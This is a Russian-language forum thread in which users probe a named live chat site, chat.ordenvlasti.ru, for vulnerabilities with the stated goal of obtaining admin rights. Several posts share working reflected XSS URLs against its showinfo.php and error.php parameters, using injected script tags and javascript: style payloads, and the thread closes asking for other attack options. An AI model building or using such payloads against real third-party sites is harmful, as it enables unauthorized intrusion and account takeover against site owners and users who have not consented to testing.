Вот гулял по просторам инета и набрел вот на этот сайт http://sin-lab.net.ru Они типа чат делают какой-то. Так вот суть вопроса, у них типа пример чата расположен по адресу http://chat.ordenvlasti.ru/ Есть ли в нем дыры и можно ли получить права админа в нем?
Вот вам XSS Code: http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cscript%3Ealert(123456)%3C/script%3E
Через сообщения (Пм) ничего не получается, т.к. у каждого сообщения свой id.. В поисковике всё тоже пофиксено.. EST a1ien, нету там xss ещё раз говорю.. Я пробовал, там всё фильтруется.. Хватит писать не по теме, хочешь что то маленькое добавить, отредактируй тот пост...
Code: http://chat.ordenvlasti.ru/showinfo.php?nick=<script>alert(123456)</script> ---------------- Чтобы вылетел алерт надо зайти в чат.
Расшарил xss в поисковике: Для выпада алерта, нужен вход в чат _http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cimage+style%3Dbackground%3Aurl%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E ============ Ещё одна: Вход в чат необязателен _http://chat.ordenvlasti.ru/error.php?msg=Пароль%20не%20верный!"><image%20style=background:url(javascript:alert(/SLIP/))> ============ На главной странице, при просмотре анкеты админа.. Хоть и пишит что ник не зареген. но алерт то вылазит) Вход в сам чат необязателен _http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><image%20style=background:url(javascript:alert(/SLIP/))> Или так: _http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><script>alert(/SLIP/)</script>
http://www.forum.antichat.ru/threadnav16184-1-10.html кажется здесь говорят о этой теме, но не уверен. p.s. тему читайте до конца.
Мля. Скачал этот чат. Пробовал тестить Xss. А нах они нужны в этом чате? С помощью их нифига не сделаешь =) Есть ещё какие либо варианты?
